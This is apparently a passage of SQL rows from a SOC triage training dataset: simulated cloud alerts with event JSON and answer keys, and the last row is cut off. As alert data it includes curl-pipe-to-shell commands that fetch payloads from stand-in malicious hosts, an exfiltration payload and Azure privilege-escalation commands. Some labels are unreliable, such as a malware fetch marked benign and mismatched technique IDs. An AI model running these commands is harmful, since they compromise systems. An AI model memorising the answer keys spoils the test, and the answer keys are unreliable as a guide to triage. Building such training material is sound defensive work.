(2020, 'AWS S3 Bucket Data Access from Unusual Location', 'medium', 'AWS GuardDuty', 'Data was accessed from an AWS S3 bucket using an IP address from a foreign country, which is unusual for the organization.', 'Data Exfiltration', 'T1537', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T03:20:45Z\",\"event_type\":\"s3_access\",\"src_ip\":\"192.0.2.44\",\"dst_ip\":\"192.0.2.55\",\"username\":\"data_analyst\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":null,\"command_line\":null}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.44\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"clean\",\"details\":\"IP rarely appears in threat logs, no malicious activity reported\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"data_analyst\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"User account verified as belonging to the data team\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The IP is clean and the user is part of the data team operating remotely.\"}', 'Intermediate', 'CLOUD', 5, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2021, 'Prisma Cloud Kubernetes Pod Anomaly', 'medium', 'Prisma Cloud', 'A Kubernetes pod executed a new process that deviates from its normal behavior, possibly indicating a misconfigured policy.', 'Execution', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:22:11Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.3.10\",\"dst_ip\":null,\"username\":\"k8s-service-account\",\"hostname\":\"kube-node-1\",\"request_body\":null,\"command_line\":\"curl http://example.com/malware.sh | sh\"}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.3.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"IP is part of internal Kubernetes cluster\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"curl http://example.com/malware.sh | sh\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"clean\",\"details\":\"Command matches known benign operations for testing environment\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"execution\",\"analysis_notes\":\"The command was executed in a testing environment and is part of scheduled tests.\"}', 'Intermediate', 'CLOUD', 5, 1, 'TECH', NULL, NULL, NULL, 0),
(2022, 'Wiz Detected Anomalous Login Patterns', 'medium', 'Wiz', 'Multiple failed login attempts followed by a successful login from an unfamiliar IP address, suggesting a potential brute force attack.', 'Brute Force', 'T1110', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:33:27Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.24\",\"dst_ip\":\"10.0.2.7\",\"username\":\"jdoe\",\"hostname\":\"corporate-vpn\",\"request_body\":null,\"command_line\":null}', '2026-03-16 03:13:19', '2026-03-16 03:13:19', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.24\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"IP has been involved in unusual login patterns but no direct malicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"User is a legitimate employee with VPN access\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The login pattern is unusual but does not indicate a security breach; user confirmed the access.\"}', 'Intermediate', 'CLOUD', 5, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2023, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'An unauthorized access attempt to an AWS S3 bucket was detected from an external IP address. The access attempt utilized stolen credentials.', 'Data Exfil', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:00Z\",\"event_type\":\"data_access\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.5\",\"username\":\"compromised_user\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive-data-bucket/* HTTP/1.1\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Username linked to recent credential leaks\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The unauthorized access attempt from a known malicious IP and the involvement of a compromised user account indicate a true positive data exfiltration attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2024, 'Azure IAM Privilege Escalation Attempt', 'high', 'Azure Defender', 'A privilege escalation attempt was detected on an Azure account using a vulnerable service principal.', 'Credential Attack', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:30:00Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"username\":\"service_principal_123\",\"hostname\":\"azuread.microsoft.com\",\"command_line\":\"az role assignment create --assignee <user_id> --role Contributor\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous privilege escalation attacks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"az role assignment create --assignee <user_id> --role Contributor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command matches known escalation technique\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of a known malicious IP and a command associated with privilege escalation confirm the attack.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2025, 'GCP Service Account Hijacking', 'critical', 'GCP SCC', 'A GCP service account was accessed from an unusual location, indicating possible hijacking.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:00:00Z\",\"event_type\":\"service_account_access\",\"src_ip\":\"192.0.2.44\",\"dst_ip\":\"10.1.0.10\",\"username\":\"gcp_service_account\",\"hostname\":\"cloud.google.com\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.44\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 525 times for credential theft activities\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"gcp_service_account\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Service account access from an unexpected region\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The unusual access patterns and the IP\'s history of malicious activity confirm this as a hijacking attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2026, 'Prisma Cloud Kubernetes Command Injection', 'high', 'Prisma Cloud', 'A command injection attempt was detected in a Kubernetes pod, indicating a potential compromise.', 'Lateral Movement', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:15:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.55\",\"dst_ip\":\"10.10.0.20\",\"username\":\"kube_user\",\"hostname\":\"kubernetes_cluster\",\"command_line\":\"curl -s http://malicious-site.com | bash\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP associated with delivery of malicious payloads\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"curl -s http://malicious-site.com | bash\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command matches known injection pattern\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The command injection attempt using a known malicious command confirms a compromise attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'HEALTHCARE', NULL, NULL, NULL, 0),
(2027, 'Wiz Serverless Function Exploitation', 'high', 'Wiz', 'A serverless function was exploited to perform unauthorized actions, indicating a potential attack vector.', 'Data Exfil', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T12:30:00Z\",\"event_type\":\"function_invocation\",\"src_ip\":\"198.51.100.99\",\"dst_ip\":\"10.0.1.15\",\"username\":\"lambda_user\",\"hostname\":\"serverless.example.com\",\"request_body\":\"function=exfil_data&target=http://malicious-exfil.com\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.99\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"IP involved in data exfiltration campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"function=exfil_data&target=http://malicious-exfil.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Payload matches known data exfiltration technique\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The unauthorized use of serverless functions and the malicious payload confirm an exfiltration attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2028, 'AWS S3 Bucket Data Leak Attempt Detected', 'critical', 'AWS GuardDuty', 'A suspicious IP attempted to access an S3 bucket with sensitive data. The IP is known for previous data exfiltration attempts.', 'Data Exfiltration', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:45:32Z\",\"event_type\":\"web_request\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.10\",\"username\":\"s3-access-user\",\"hostname\":\"bucket-server-1\",\"request_body\":\"GET /sensitive-data HTTP/1.1\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1123 times for data exfiltration attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"s3-access-user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"User account used for accessing S3 buckets\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"GET /sensitive-data HTTP/1.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Suspicious request pattern matching known exfiltration attempts\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The source IP is known for malicious activity and attempted unauthorized access to sensitive data.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2029, 'Azure IAM Privilege Escalation Detected', 'high', 'Azure Defender', 'An unauthorized user attempted to escalate privileges within Azure IAM to gain access to administrative functions.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:12:45Z\",\"event_type\":\"login_failure\",\"src_ip\":\"203.0.113.50\",\"dst_ip\":\"10.0.0.5\",\"username\":\"unauthorized_user\",\"hostname\":\"azure-ad-server\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.50\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in privilege escalation attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"unauthorized_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"User not authorized for administrative access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP address has a history of unauthorized access attempts, indicating a potential privilege escalation attack.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2030, 'GCP Service Account Hijacking Attempt', 'critical', 'GCP SCC', 'Detected unauthorized attempts to use a service account to access sensitive resources in GCP.', 'Credential Attack', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:30:20Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.0.2.25\",\"dst_ip\":\"10.1.1.15\",\"username\":\"compromised-service-account\",\"hostname\":\"gcp-resource-server\",\"request_body\":\"\",\"command_line\":\"gcloud auth activate-service-account --key-file=compromised-key.json\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP associated with unauthorized service account usage\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"gcloud auth activate-service-account --key-file=compromised-key.json\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command matches known patterns for service account hijacking\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The command and IP address indicate a hijacking attempt of a service account, confirmed by external threat intelligence.\"}', 'Beginner', 'CLOUD', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2031, 'Unauthorized Access to Kubernetes Node Detected', 'high', 'Prisma Cloud', 'Detected unauthorized access attempts to a Kubernetes node from an external IP known for malicious activities.', 'Lateral Movement', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T13:55:10Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.45\",\"dst_ip\":\"10.20.30.40\",\"username\":\"k8s-node-user\",\"hostname\":\"k8s-node-1\",\"request_body\":\"\",\"command_line\":\"\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for unauthorized access attempts to cloud environments\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"k8s-node-user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Kubernetes node user account\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The unauthorized access attempts from a known malicious IP suggest an attempt to move laterally within the cloud infrastructure.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2032, 'Unauthorized AWS Lambda Function Invocation', 'medium', 'Wiz', 'An AWS Lambda function was invoked by an unauthorized IP address, potentially indicating malicious access.', 'Lateral Movement', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:20:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.60\",\"dst_ip\":\"10.100.1.20\",\"username\":\"lambda-invoker\",\"hostname\":\"lambda-function-1\",\"request_body\":\"\",\"command_line\":\"aws lambda invoke --function-name dataProcessing\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.60\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in unauthorized cloud service invocations\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"aws lambda invoke --function-name dataProcessing\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command pattern matches unauthorized service access\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The invocation of a Lambda function from an unauthorized IP suggests an attempt to exploit cloud services.\"}', 'Beginner', 'CLOUD', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2033, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'Multiple unauthorized access attempts to an S3 bucket detected from a foreign IP address, indicating potential data exfiltration.', 'Data Exfiltration', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:23:54Z\",\"event_type\":\"s3_access\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"compromised_user\",\"hostname\":\"aws-instance-34\",\"request_body\":\"GET /sensitive-data/*\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal user account compromised\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"GET /sensitive-data/*\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Access pattern indicates potential data exfiltration\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"The IP and access pattern indicate a strong likelihood of data exfiltration.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2034, 'Azure IAM Privilege Escalation Attempt', 'high', 'Azure Defender', 'An attempt to escalate privileges in Azure IAM was detected from an unusual IP address, potentially leading to unauthorized access.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T16:45:32Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"198.51.100.23\",\"username\":\"admin_user\",\"hostname\":\"azure-vm-12\",\"command_line\":\"az role assignment create --role \'Owner\' --assignee admin_user\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP involved in multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"az role assignment create --role \'Owner\' --assignee admin_user\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used for unauthorized privilege escalation\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The command and IP usage are indicative of a privilege escalation attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2035, 'GCP Service Account Hijacking Detected', 'critical', 'GCP SCC', 'A potential hijack of a service account was detected with abnormal access patterns and usage from a known malicious IP.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T11:17:21Z\",\"event_type\":\"service_account_access\",\"src_ip\":\"203.0.113.77\",\"username\":\"service-account-gcp\",\"hostname\":\"gcp-instance-22\",\"request_body\":\"GET /project-secrets\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.77\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported for multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account-gcp\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Service account usage pattern abnormal\"}},{\"id\":\"artifact_3\",\"type\":\"payload\",\"value\":\"GET /project-secrets\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Request for sensitive data indicates hijack attempt\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The IP and access request indicate a strong likelihood of service account hijacking.\"}', 'Beginner', 'CLOUD', 3, 1, 'RETAIL', NULL, NULL, NULL, 0),
(2036, 'Unauthorized Kubernetes API Access Attempt', 'high', 'Prisma Cloud', 'A foreign IP attempted unauthorized access to the Kubernetes API, indicating a potential threat to cluster security.', 'Web Attack', 'T1059', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T09:35:10Z\",\"event_type\":\"api_access\",\"src_ip\":\"192.0.2.55\",\"dst_ip\":\"10.0.0.5\",\"username\":\"kube-admin\",\"request_body\":\"POST /api/v1/namespaces/default/pods\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP associated with previous unauthorized API access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"POST /api/v1/namespaces/default/pods\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Unauthorized attempt to access Kubernetes API\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The access attempt from an external IP suggests unauthorized API usage.\"}', 'Beginner', 'CLOUD', 3, 1, 'GOVERNMENT', NULL, NULL, NULL, 0),
(2037, 'Serverless Function Abuse Detected', 'medium', 'Wiz', 'Anomalous activity detected in serverless function execution, possibly indicating an attempt to exploit cloud function vulnerabilities.', 'Lateral Movement', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-03-16T15:12:45Z\",\"event_type\":\"function_execution\",\"src_ip\":\"203.0.113.88\",\"username\":\"function-user\",\"hostname\":\"cloud-function-1\",\"command_line\":\"run_function --task=exploit_attempt\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.88\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in previous cloud function exploitation attempts\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"run_function --task=exploit_attempt\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command indicates potential function exploitation\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The command and IP indicate a possible exploitation attempt of cloud functions.\"}', 'Beginner', 'CLOUD', 3, 1, 'ENERGY', NULL, NULL, NULL, 0),
(2038, 'AWS S3 Bucket Data Leak Detected', 'critical', 'AWS GuardDuty', 'Sensitive data was accessed from an AWS S3 bucket by an unauthorized foreign IP address. This indicates a potential data exfiltration attack.', 'Data Exfil', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T08:25:43Z\",\"event_type\":\"data_access\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"192.168.1.10\",\"username\":\"unknown\",\"hostname\":\"s3.amazonaws.com\",\"request_body\":\"GET /sensitive-data/file.txt HTTP/1.1\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1500 times for data exfiltration activities\"}},{\"id\":\"artifact_2\",\"type\":\"payload\",\"value\":\"GET /sensitive-data/file.txt HTTP/1.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Suspicious data access request identified\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Unauthorized access to sensitive data indicates a confirmed data exfiltration attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'TECH', NULL, NULL, NULL, 0),
(2039, 'Azure IAM Privilege Escalation Attempt', 'high', 'Azure Defender', 'An unauthorized user attempted to escalate privileges within Azure IAM. This could lead to unauthorized access to critical resources.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T10:15:30Z\",\"event_type\":\"privilege_escalation\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"10.0.0.5\",\"username\":\"malicious_user\",\"hostname\":\"azure-iam\",\"command_line\":\"az role assignment create --assignee malicious_user --role Contributor\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"IP flagged for multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"az role assignment create --assignee malicious_user --role Contributor\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Command used in privilege escalation attempts\"}}],\"expected_actions\":[\"reset_credentials\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The use of unauthorized command indicates an active privilege escalation attempt.\"}', 'Beginner', 'CLOUD', 3, 1, 'FINANCE', NULL, NULL, NULL, 0),
(2040, 'GCP Service Account Hijacking Detected', 'high', 'GCP SCC', 'A service account was accessed from an unusual IP, indicating possible hijacking. This could result in unauthorized operations within the GCP environment.', 'Credential Attack', 'T1078', 1, 'New', NULL, '{\"timestamp\":\"2026-03-16T14:45:12Z\",\"event_type\":\"account_access\",\"src_ip\":\"192.0.2.55\",\"dst_ip\":\"10.0.1.5\",\"username\":\"service-account@example-project.iam.gserviceaccount.com\",\"hostname\":\"gcp-auth\",\"request_body\":\"GET /compute/v1/projects/example-project/zones/us-central1-a/instances\"}', '2026-03-16 03:17:02', '2026-03-16 03:17:02', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.0.2.55\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP involved in unauthorized GCP service account access\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"service-account@example-project.iam.gserviceaccount.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Service account potentially compromised\"}}],\"expected_actions\":[\"reset_credentials\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"Unusual access patterns and IP indicate a possible service account 